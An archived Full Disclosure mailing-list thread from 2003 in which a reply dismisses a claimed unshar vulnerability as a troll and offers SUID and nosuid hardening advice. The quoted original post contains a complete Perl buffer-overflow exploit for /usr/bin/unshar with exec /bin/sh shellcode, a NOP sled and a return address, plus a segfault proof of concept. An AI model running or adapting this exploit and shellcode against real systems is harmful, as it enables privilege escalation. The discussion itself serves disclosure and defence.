Full Disclosure mailing list archives
Re: flames security group start to play , yet another vuln found (rustymemory and welshboi)
From: Todd Burroughs <todd () hostopia com>
Date: Thu, 4 Dec 2003 02:34:07 -0500 (EST)
This has to be a troll, I mean if I made /bin/sh SUID root and gave you a shell, you could probably get root on my system. You shouldn't have much on your system that is SUID root. I have no idea why someone would even think that unshar would be set this way. If you use SuSE, set security to "paranoid" and it does a decent job, after that you will need to add whatever you need to the security.local file. depending on what you use the system for. I know I'm biting on this, but it does underscore the fact that you should "unsuid" anything that is not really needed on your system. I make a small partition and mount everything else "nosuid". I put anything that needs suid or sgid on that filesystem and make symlinks to where it should be. This makes is easy to find SUID programs, run mount and make sure things are mounted nosuid, then look at your "suid partition". Todd Burroughs --- The Internet has given us unprecedented opportunity to communicate and share on a global scale without borders; fight to keep it that way. On Wed, 3 Dec 2003, KF wrote:
if you are bored .... download unrar. -KF rustymemory wrote:By: flames.bluefox.net.nz if unshar suid; then you w00t proof of concept? rustymemory@flames:~$ unshar -f `perl -e 'print"A"x2000'` ............................AAAAAAAAAAAAAASegmentation fault welshboi@flames:~$ more unshar.pl #!/usr/bin/perl #/usr/bin/unshar local sploit. #coded by welshboi (deadbeat) #found by rustymemory # #FLAMES SECURITY GROUP #Private, please dont distribute #affects all linux distributions , tested on slackware 9.1 and MDK ############################################### #[deadbeat@pikachu sploits]$ perl unshar.pl # # # #[] /usr/bin/unshar exploit # #[] coded by: deadbeat [] # #[] found by: rustymemory [] # #_f1GWugHu[SPZ # # # #sh-2.05b$ # ############################################### # 47byte shellcode (exec /bin/sh) $hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07". "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b". "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff". "\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01"; $egg = 2000; $buf = 1128; $nop = "\x90"; $offset = 0; $ret =0x40055bdc; if(@ARGV == 1) {$offset = $ARGV[0];} $addr = pack('l', ($ret + $offset)); for($i = 0; $i<$buf; $i += 4){$evil .=$addr;} for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;} $evil .= $hell; print "\n[] /usr/bin/unshar exploit []\n"; print "[] coded by: deadbeat, uk2sec []\n"; print "[] found by: rustymemory []\n\n"; print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n"); system("/usr/bin/unshar -f $evil"); --------------------------------------------------------- shouts to ? calidan(daddeh) , linucks ( wifi whore) , h0stile (the maniac) , and the rest of flames security group. and rusty's fiancee _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- flames security group start to play , yet another vuln found (rustymemory and welshboi) rustymemory (Dec 03)
- Re: flames security group start to play , yet another vuln found (rustymemory and welshboi) KF (Dec 03)
- Re: flames security group start to play , yet another vuln found (rustymemory and welshboi) Todd Burroughs (Dec 04)
- Re: flames security group start to play , yet another vuln found (rustymemory and welshboi) KF (Dec 03)